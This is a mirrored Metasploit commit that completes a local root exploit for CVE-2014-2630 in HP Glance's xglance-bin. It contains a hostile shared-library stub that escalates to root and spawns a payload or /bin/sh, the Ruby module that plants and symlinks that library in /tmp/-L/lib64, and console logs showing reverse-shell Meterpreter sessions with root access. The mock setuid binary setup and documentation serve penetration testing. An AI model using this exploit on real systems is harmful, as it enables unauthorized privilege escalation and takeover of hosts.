mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
working exploit
This commit is contained in:
parent
58074dc6bb
commit
e1f1ad45bc
@ -9,8 +9,8 @@ void __cxa_finalize (void *d) {
|
|||||||
}
|
}
|
||||||
void __attribute__((constructor)) init() {
|
void __attribute__((constructor)) init() {
|
||||||
setresuid(geteuid(), geteuid(), geteuid());
|
setresuid(geteuid(), geteuid(), geteuid());
|
||||||
system("#{payload_path}")
|
execl("#{payload_path}", (char *)NULL, (char *)NULL);
|
||||||
// execl("/bin/sh", (char *)NULL, (char *)NULL);
|
execl("/bin/sh", (char *)NULL, (char *)NULL);
|
||||||
}
|
}
|
||||||
int applicationShellClassRec = 0;
|
int applicationShellClassRec = 0;
|
||||||
int applicationShellWidgetClass = 0;
|
int applicationShellWidgetClass = 0;
|
||||||
@ -3641,4 +3641,3 @@ int XWidthOfScreen = 0;
|
|||||||
int XWindowEvent = 0;
|
int XWindowEvent = 0;
|
||||||
int XWithdrawWindow = 0;
|
int XWithdrawWindow = 0;
|
||||||
int overrideShellWidgetClass = 0;
|
int overrideShellWidgetClass = 0;
|
||||||
|
|
BIN
data/exploits/CVE-2014-2630/libXm.so.3
Normal file
BIN
data/exploits/CVE-2014-2630/libXm.so.3
Normal file
Binary file not shown.
227
documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md
Normal file
227
documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md
Normal file
@ -0,0 +1,227 @@
|
|||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This exploit takes advantage of the fact that xglance-bin, part of
|
||||||
|
HP's Glance (or Performance Monitoring) version 11'and subsequent'
|
||||||
|
, was compiled with an insecure RPATH option that attempts to load
|
||||||
|
libraries from a user controlled location (-L/lib64/).
|
||||||
|
Creating libraries in this location will result in an escalation
|
||||||
|
of privileges to root.
|
||||||
|
|
||||||
|
### Mock Application
|
||||||
|
|
||||||
|
Unfortunately the application is a pay for application and the version is many years old by the time the
|
||||||
|
PoC was released. Instead, we use a mock binary based on the permissions noted in the original CVE
|
||||||
|
announcement, and the `ldd` details from the PoC.
|
||||||
|
|
||||||
|
The following commands were performed on Fedora 31 to create the binary.
|
||||||
|
When the binary was pushed to rhel7.1 for testing, a 'of size' libXm.so.4 was required
|
||||||
|
so ```cp /lib64/libffi.so.6 ./-L/lib64/libXm.so.4``` was enough to make the binary
|
||||||
|
vulnerable.
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo su
|
||||||
|
cd ~
|
||||||
|
dnf install motif-devel
|
||||||
|
|
||||||
|
cat > main.c << DONE
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <Xm/Xm.h>
|
||||||
|
|
||||||
|
void main(){
|
||||||
|
printf("HP xglance-bin emulator %d\n",XmVERSION);
|
||||||
|
char* x = XmCvtXmStringToCT(NULL);
|
||||||
|
printf("%p",x);
|
||||||
|
}
|
||||||
|
|
||||||
|
DONE
|
||||||
|
|
||||||
|
|
||||||
|
mkdir -p ./-L/lib64;
|
||||||
|
cd ./-L/lib64;
|
||||||
|
```
|
||||||
|
The follow commands copies files to the path for building.
|
||||||
|
However, they may not be installed on a default rhel system.
|
||||||
|
|
||||||
|
```
|
||||||
|
# libXm.so.3 may fail on newer systems like fedora 31
|
||||||
|
cp /usr/lib64/libXm.so.3 .;
|
||||||
|
cp /usr/lib64/libXm.so.4 libXm.so.3;
|
||||||
|
cp /usr/lib64/libXp.so.6 .;
|
||||||
|
cp /usr/lib64/libXt.so.6 .;
|
||||||
|
cd ../..;
|
||||||
|
```
|
||||||
|
gcc -lXm main.c -o xglance-bin -Wl,-rpath=-L/lib64:/usr/lib64:/usr/X11R6/lib64:/opt/perf/lib64;
|
||||||
|
mkdir -p /opt/perf/bin/;
|
||||||
|
cp xglance-bin /opt/perf/bin/;
|
||||||
|
chown root:bin /opt/perf/bin/xglance-bin;
|
||||||
|
chmod 4555 /opt/perf/bin/xglance-bin;
|
||||||
|
```
|
||||||
|
|
||||||
|
To confirm the file is vulnerable, run:
|
||||||
|
```
|
||||||
|
[fedora@fedora31 ~]$ ldd /opt/perf/bin/xglance-bin | grep -- -L/lib64/
|
||||||
|
libXt.so.6 => -L/lib64/libXt.so.6 (0x00007f727441b000)
|
||||||
|
libXp.so.6 => -L/lib64/libXp.so.6 (0x00007f72742b2000)
|
||||||
|
```
|
||||||
|
We'll want to see one or more `libX*.so*` files with `-L/lib64/`.
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Install the application
|
||||||
|
2. Start msfconsole
|
||||||
|
3. Get a session
|
||||||
|
4. Do: ```use exploit/linux/local/hp_xglance_priv_esc```
|
||||||
|
5. Do: ```set session #```
|
||||||
|
6. Do: ```run```
|
||||||
|
7. You should get a root shell.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
### COMPILE
|
||||||
|
|
||||||
|
If the .so exploit should be compiled on the system. `gcc` is required.
|
||||||
|
More noisey, but more AV resilient. Default is `true`
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Mock binary on Fedora 31 with compile
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] Processing xglance.rb for ERB directives.
|
||||||
|
resource (xglance.rb)> use auxiliary/scanner/ssh/ssh_login
|
||||||
|
resource (xglance.rb)> set rhosts 2.2.2.2
|
||||||
|
rhosts => 2.2.2.2
|
||||||
|
resource (xglance.rb)> set username fedora
|
||||||
|
username => fedora
|
||||||
|
resource (xglance.rb)> set password fedora
|
||||||
|
password => fedora
|
||||||
|
resource (xglance.rb)> run
|
||||||
|
[+] 2.2.2.2:22 - Success: 'fedora:fedora' ''
|
||||||
|
[*] Command shell session 1 opened (1.1.1.1:34379 -> 2.2.2.2:22) at 2020-04-19 14:39:45 -0400
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
```
|
||||||
|
resource (xglance.rb)> use exploit/linux/local/hp_xglance_priv_esc
|
||||||
|
resource (xglance.rb)> set session -1
|
||||||
|
session => -1
|
||||||
|
resource (xglance.rb)> set verbose true
|
||||||
|
verbose => true
|
||||||
|
resource (xglance.rb)> rexploit
|
||||||
|
[*] Reloading module...
|
||||||
|
[!] SESSION may not be compatible with this module.
|
||||||
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||||
|
[+] xglance-bin found, and linked to vulnerable relative path -L/lib64/ through libXt.so.6
|
||||||
|
[*] Deleting exploit folder: /tmp/-L
|
||||||
|
[*] Creating exploit folder: /tmp/-L/lib64/
|
||||||
|
[+] gcc is installed
|
||||||
|
[*] Live compiling exploit on system...
|
||||||
|
[*] Max line length is 65537
|
||||||
|
[*] Writing 106298 bytes in 7 chunks of 61359 bytes (octal-encoded), using printf
|
||||||
|
[*] Next chunk is 61584 bytes
|
||||||
|
[*] Next chunk is 60411 bytes
|
||||||
|
[*] Next chunk is 61525 bytes
|
||||||
|
[*] Next chunk is 61438 bytes
|
||||||
|
[*] Next chunk is 61757 bytes
|
||||||
|
[*] Next chunk is 30375 bytes
|
||||||
|
[*] uploading payload
|
||||||
|
[*] Writing '/tmp/.u4aLoiq' (207 bytes) ...
|
||||||
|
[*] Max line length is 65537
|
||||||
|
[*] Writing 207 bytes in 1 chunks of 630 bytes (octal-encoded), using printf
|
||||||
|
[*] Launching xglance-bin...
|
||||||
|
[*] Transmitting intermediate stager...(106 bytes)
|
||||||
|
[*] Sending stage (980808 bytes) to 2.2.2.2
|
||||||
|
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55298) at 2020-04-19 14:40:05 -0400
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: no-user @ fedora31 (uid=0, gid=1000, euid=0, egid=1000)
|
||||||
|
meterpreter > shell
|
||||||
|
Process 1699 created.
|
||||||
|
Channel 1 created.
|
||||||
|
whoami
|
||||||
|
root
|
||||||
|
^Z
|
||||||
|
Background channel 1? [y/N] y
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : 2.2.2.2
|
||||||
|
OS : Fedora 31 (Linux 5.3.7-301.fc31.x86_64)
|
||||||
|
Architecture : x64
|
||||||
|
BuildTuple : i486-linux-musl
|
||||||
|
Meterpreter : x86/linux
|
||||||
|
meterpreter >
|
||||||
|
```
|
||||||
|
|
||||||
|
### Mock binary on rhel 7.1 no compile
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] Processing xglance.rb for ERB directives.
|
||||||
|
resource (xglance.rb)> use auxiliary/scanner/ssh/ssh_login
|
||||||
|
resource (xglance.rb)> set rhosts 192.168.2.243
|
||||||
|
rhosts => 192.168.2.243
|
||||||
|
resource (xglance.rb)> set username redhat
|
||||||
|
username => redhat
|
||||||
|
resource (xglance.rb)> set password redhat
|
||||||
|
password => redhat
|
||||||
|
resource (xglance.rb)> run
|
||||||
|
[+] 192.168.2.243:22 - Success: 'redhat:redhat' ''
|
||||||
|
[*] Command shell session 1 opened (192.168.2.128:45901 -> 192.168.2.243:22) at 2020-04-19 14:59:53 -0400
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
```
|
||||||
|
msf5 exploit(linux/local/hp_xglance_priv_esc) > rexploit
|
||||||
|
[*] Reloading module...
|
||||||
|
|
||||||
|
[!] SESSION may not be compatible with this module.
|
||||||
|
[*] Started reverse TCP handler on 192.168.2.128:4444
|
||||||
|
[+] xglance-bin found, and linked to vulnerable relative path -L/lib64/ through libXm.so.4
|
||||||
|
[*] Deleting exploit folder: /tmp/-L
|
||||||
|
[*] Creating exploit folder: /tmp/-L/lib64/
|
||||||
|
[*] Dropping pre-compiled exploit on system...
|
||||||
|
[*] Writing '/tmp/-L/lib64/libXm.so.3' (368248 bytes) ...
|
||||||
|
[*] Max line length is 65537
|
||||||
|
[*] Writing 368248 bytes in 23 chunks of 46385 bytes (octal-encoded), using printf
|
||||||
|
[*] Next chunk is 53790 bytes
|
||||||
|
[*] Next chunk is 38675 bytes
|
||||||
|
[*] Next chunk is 38759 bytes
|
||||||
|
[*] Next chunk is 38694 bytes
|
||||||
|
[*] Next chunk is 38757 bytes
|
||||||
|
[*] Next chunk is 38658 bytes
|
||||||
|
[*] Next chunk is 63466 bytes
|
||||||
|
[*] Next chunk is 62734 bytes
|
||||||
|
[*] Next chunk is 63857 bytes
|
||||||
|
[*] Next chunk is 63812 bytes
|
||||||
|
[*] Next chunk is 46324 bytes
|
||||||
|
[*] Next chunk is 35989 bytes
|
||||||
|
[*] Next chunk is 38405 bytes
|
||||||
|
[*] Next chunk is 38978 bytes
|
||||||
|
[*] Next chunk is 38950 bytes
|
||||||
|
[*] Next chunk is 38935 bytes
|
||||||
|
[*] Next chunk is 40042 bytes
|
||||||
|
[*] Next chunk is 63562 bytes
|
||||||
|
[*] Next chunk is 63562 bytes
|
||||||
|
[*] Next chunk is 63521 bytes
|
||||||
|
[*] Next chunk is 63618 bytes
|
||||||
|
[*] Next chunk is 28951 bytes
|
||||||
|
[*] uploading payload
|
||||||
|
[*] Writing '/tmp/.u4aLoiq' (207 bytes) ...
|
||||||
|
[*] Max line length is 65537
|
||||||
|
[*] Writing 207 bytes in 1 chunks of 630 bytes (octal-encoded), using printf
|
||||||
|
[*] Launching xglance-bin...
|
||||||
|
[*] Transmitting intermediate stager...(106 bytes)
|
||||||
|
[*] Sending stage (980808 bytes) to 192.168.2.243
|
||||||
|
[*] Meterpreter session 2 opened (192.168.2.128:4444 -> 192.168.2.243:33373) at 2020-04-19 15:09:55 -0400
|
||||||
|
[+] Deleted /tmp/-L/lib64/libXm.so.3
|
||||||
|
[+] Deleted /tmp/.u4aLoiq
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: no-user @ localhost.localdomain (uid=0, gid=1000, euid=0, egid=1000)
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : localhost.localdomain
|
||||||
|
OS : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
|
||||||
|
Architecture : x64
|
||||||
|
BuildTuple : i486-linux-musl
|
||||||
|
Meterpreter : x86/linux
|
||||||
|
meterpreter >
|
||||||
|
```
|
@ -1,65 +0,0 @@
|
|||||||
## Vulnerable Application
|
|
||||||
|
|
||||||
Instructions to get the vulnerable application. If applicable, include links to the vulnerable install files, as well as instructions on installing/configuring the environment if it is different than a standard install. Much of this will come from the PR, and can be copy/pasted.
|
|
||||||
|
|
||||||
### Mock Application
|
|
||||||
|
|
||||||
```
|
|
||||||
sudo dnf install motif-devel
|
|
||||||
cat > main.c << DONE
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <Xm/Xm.h>
|
|
||||||
#include <Xt/Xt.h>
|
|
||||||
#include <Xp/Xp.h>
|
|
||||||
|
|
||||||
void main(){
|
|
||||||
printf("HP xglance-bin emulator %d\n",XmVERSION);
|
|
||||||
char* x = XmCvtXmStringToCT(NULL);
|
|
||||||
printf("%p",x);
|
|
||||||
}
|
|
||||||
|
|
||||||
DONE
|
|
||||||
|
|
||||||
gcc -lXm main.c -o xglance-bin -Wl,-rpath=-L/lib64:/usr/lib64:/usr/X11R6/lib64:/opt/perf/lib64
|
|
||||||
sudo mkdir -p /opt/perf/bin/
|
|
||||||
sudo cp xglance-bin /opt/perf/bin/
|
|
||||||
sudo chown root:bin /opt/perf/bin/xglance-bin
|
|
||||||
sudo chmod 4555 /opt/perf/bin/xglance-bin
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Verification Steps
|
|
||||||
Example steps in this format (is also in the PR):
|
|
||||||
|
|
||||||
1. Install the application
|
|
||||||
2. Start msfconsole
|
|
||||||
3. Do: ```use [module path]```
|
|
||||||
4. Do: ```run```
|
|
||||||
5. You should get a shell.
|
|
||||||
|
|
||||||
## Options
|
|
||||||
List each option and how to use it.
|
|
||||||
|
|
||||||
### Option Name
|
|
||||||
|
|
||||||
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
|
|
||||||
|
|
||||||
## Scenarios
|
|
||||||
Specific demo of using the module that might be useful in a real world scenario.
|
|
||||||
|
|
||||||
|
|
||||||
### Version and OS
|
|
||||||
|
|
||||||
```
|
|
||||||
code or console output
|
|
||||||
```
|
|
||||||
|
|
||||||
For example:
|
|
||||||
|
|
||||||
To do this specific thing, here's how you do it:
|
|
||||||
|
|
||||||
```
|
|
||||||
msf > use module_name
|
|
||||||
msf auxiliary(module_name) > set POWERLEVEL >9000
|
|
||||||
msf auxiliary(module_name) > exploit
|
|
||||||
```
|
|
@ -3,19 +3,16 @@
|
|||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core/exploit/local/linux'
|
|
||||||
require 'msf/core/exploit/exe'
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Local
|
class MetasploitModule < Msf::Exploit::Local
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
include Msf::Post::Linux::Priv
|
include Msf::Post::Linux::Priv
|
||||||
include Msf::Post::Linux::System
|
include Msf::Post::Linux::System
|
||||||
#include Msf::Post::Linux::Kernel
|
include Msf::Post::Linux::Compile
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
include Msf::Exploit::Local::Linux
|
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(
|
super(
|
||||||
@ -24,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
'Name' => 'HP Performance Monitoring xglance Priv Esc',
|
'Name' => 'HP Performance Monitoring xglance Priv Esc',
|
||||||
'Description' => %q(
|
'Description' => %q(
|
||||||
This exploit takes advantage of the fact that xglance-bin, part of
|
This exploit takes advantage of the fact that xglance-bin, part of
|
||||||
HP's Glance (or Performance Monitoring), was compiled with an insecure
|
HP's Glance (or Performance Monitoring) version 11 'and subsequent'
|
||||||
|
, was compiled with an insecure
|
||||||
RPATH option that attempts to load libraries from a user controlled
|
RPATH option that attempts to load libraries from a user controlled
|
||||||
location (-L/lib64/). Creating libraries in this location will result
|
location (-L/lib64/). Creating libraries in this location will result
|
||||||
in an escalation of privileges to root.
|
in an escalation of privileges to root.
|
||||||
@ -59,6 +57,9 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
|
register_options [
|
||||||
|
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
|
||||||
|
]
|
||||||
register_advanced_options [
|
register_advanced_options [
|
||||||
OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
|
OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
|
||||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||||
@ -71,6 +72,10 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
datastore['WritableDir'].to_s
|
datastore['WritableDir'].to_s
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def exploit_folder
|
||||||
|
"#{base_dir}/-L/lib64/"
|
||||||
|
end
|
||||||
|
|
||||||
# Simplify and standardize uploading a file
|
# Simplify and standardize uploading a file
|
||||||
def upload(path, data)
|
def upload(path, data)
|
||||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||||
@ -85,12 +90,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
end
|
end
|
||||||
|
|
||||||
# Pull the exploit binary or file (.c typically) from our system
|
# Pull the exploit binary or file (.c typically) from our system
|
||||||
def exploit_data
|
def exploit_data(file)
|
||||||
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630.c')
|
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
|
||||||
end
|
|
||||||
|
|
||||||
def exploit_folder
|
|
||||||
"#{base_dir}/-L/lib64/"
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def find_libs
|
def find_libs
|
||||||
@ -133,64 +134,44 @@ class MetasploitModule < Msf::Exploit::Local
|
|||||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||||
end
|
end
|
||||||
|
|
||||||
# Upload payload executable
|
# delete exploit folder in case a previous attempt failed
|
||||||
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
|
vprint_status("Deleting exploit folder: #{base_dir}/-L")
|
||||||
upload_and_chmodx payload_path, generate_payload_exe
|
rm_f "#{base_dir}/-L"
|
||||||
|
|
||||||
# Set target
|
|
||||||
uname = cmd_exec 'uname -m'
|
|
||||||
vprint_status "System architecture is #{uname}"
|
|
||||||
if target.name.eql? 'Automatic'
|
|
||||||
case uname
|
|
||||||
when 'x86_64'
|
|
||||||
my_target = targets[2]
|
|
||||||
when /x86/, /i\d86/
|
|
||||||
my_target = targets[1]
|
|
||||||
else
|
|
||||||
fail_with Failure::NoTarget, 'Unable to automatically select a target'
|
|
||||||
end
|
|
||||||
else
|
|
||||||
my_target = target
|
|
||||||
end
|
|
||||||
print_status "Using target: #{my_target.name}"
|
|
||||||
|
|
||||||
cpu = nil
|
|
||||||
case my_target['Arch']
|
|
||||||
when ARCH_X86
|
|
||||||
cpu = Metasm::Ia32.new
|
|
||||||
when ARCH_X64
|
|
||||||
cpu = Metasm::X86_64.new
|
|
||||||
else
|
|
||||||
fail_with Failure::NoTarget, 'Target is not compatible'
|
|
||||||
end
|
|
||||||
|
|
||||||
so_stub = exploit_data
|
|
||||||
so_stub.sub!('#{payload_path}', payload_path)
|
|
||||||
begin
|
|
||||||
so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
|
|
||||||
rescue
|
|
||||||
print_error "Metasm encoding failed: #{$ERROR_INFO}"
|
|
||||||
elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
|
|
||||||
elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
|
|
||||||
fail_with Failure::Unknown, 'Metasm encoding failed'
|
|
||||||
end
|
|
||||||
|
|
||||||
# delete folder
|
|
||||||
vprint_status("Deleting exploit folder: #{exploit_folder}")
|
|
||||||
rm_f exploit_folder
|
|
||||||
# make folder
|
# make folder
|
||||||
vprint_status("Creating exploit folder: #{exploit_folder}")
|
vprint_status("Creating exploit folder: #{exploit_folder}")
|
||||||
cmd_exec "mkdir -p #{exploit_folder}"
|
cmd_exec "mkdir -p #{exploit_folder}"
|
||||||
register_file_for_cleanup "#{base_dir}/-L"
|
register_dir_for_cleanup "#{base_dir}/-L"
|
||||||
# upload payload
|
|
||||||
vprint_status('Uploading so and creating symlinks')
|
# drop our .so on the system that calls our payload
|
||||||
upload("#{exploit_folder}libXm.so.3",so)
|
# we need gcc to compile instead of metasm since metasm
|
||||||
# upload payload folder 2
|
# removes unused variables, which we need to keep xglance-bin
|
||||||
|
# from breaking and not launching our exploit
|
||||||
|
so_file = "#{exploit_folder}libXm.so.3"
|
||||||
|
if live_compile?
|
||||||
|
vprint_status 'Live compiling exploit on system...'
|
||||||
|
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
|
||||||
|
code = exploit_data('CVE-2014-2630.c')
|
||||||
|
code.sub!('#{payload_path}', payload_path) # inject our payload path
|
||||||
|
upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
|
||||||
|
rm_f "#{so_file}.c"
|
||||||
|
else
|
||||||
|
payload_path = '/tmp/.u4aLoiq'
|
||||||
|
vprint_status 'Dropping pre-compiled exploit on system...'
|
||||||
|
upload_and_chmodx so_file, exploit_data('libXm.so.3')
|
||||||
|
end
|
||||||
|
|
||||||
|
# Upload payload executable
|
||||||
|
vprint_status 'uploading payload'
|
||||||
|
upload_and_chmodx payload_path, generate_payload_exe
|
||||||
|
|
||||||
|
# link so files to exploit vuln
|
||||||
lib = find_libs
|
lib = find_libs
|
||||||
cmd_exec "ln -s #{exploit_folder}libXm.so.3 #{exploit_folder}#{lib}"
|
# just to be safe, Xt and Xp were in the original exploit
|
||||||
# just to be safe since this was in the original exploit
|
# our mock binary is also exploitsable through libXmu.so.6
|
||||||
cmd_exec "ln -s #{exploit_folder}libXm.so.3 #{exploit_folder}libXp.so.6"
|
# unsure about the real binary
|
||||||
cmd_exec "ln -s #{exploit_folder}libXm.so.3 #{exploit_folder}libXt.so.6"
|
['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
|
||||||
|
cmd_exec "cd #{exploit_folder}; ln -s libXm.so.3 #{l}"
|
||||||
|
end
|
||||||
|
|
||||||
# Launch exploit
|
# Launch exploit
|
||||||
print_status "Launching xglance-bin..."
|
print_status "Launching xglance-bin..."
|
||||||
|
Loading…
Reference in New Issue
Block a user